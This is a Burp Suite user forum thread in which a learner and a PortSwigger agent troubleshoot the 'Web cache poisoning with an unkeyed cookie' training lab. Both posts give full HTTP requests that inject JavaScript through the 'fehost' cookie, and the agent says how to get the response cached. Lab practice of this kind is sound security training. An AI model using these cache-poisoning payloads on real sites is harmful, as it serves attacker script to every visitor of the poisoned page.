Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

PortSwigger Lab: Web cache poisoning with an unkeyed cookie

Luke | Last updated: Feb 27, 2024 01:05PM UTC

Having the same issue with Webcache Poisoning - unkeyed cookie. Have managed to trigger the pop up on the site whenever a viewer loads homepage, but the automated user who is supposed to visit the site never does. Not sure if there is something wrong with my payload? I resend the payload every 25s, which is within the 30s timeout window. - - - - Payload: GET / HTTP/2 Host: 0a8600920336c1ba81d202dc00f7001d.web-security-academy.net Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Cookie: session=91bXxXhkel77jGsDWF58KtsqVPZTOVGl; fehost=asdf%22%2dalert(1)%2d%22;

Dominyque, PortSwigger Agent | Last updated: Feb 27, 2024 02:01PM UTC

Hi Luke I have just tested the lab and can confirm that it works as it should Have you tried following the community solution video for further guidance? Following the solution video gives you a payload like this and sending this request until your response gets an X-Cache: hit solves the lab: GET / HTTP/2 Host: 0acd00b10337c8dc80bd3f5e006f00e5.web-security-academy.net Cookie: session=Aq8clLU3mzbzTSvoURXAzJvBGaFHT3N9; fehost=helloHacker"-alert(1)-"helloHacker Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://0acd00b10337c8dc80bd3f5e006f00e5.web-security-academy.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.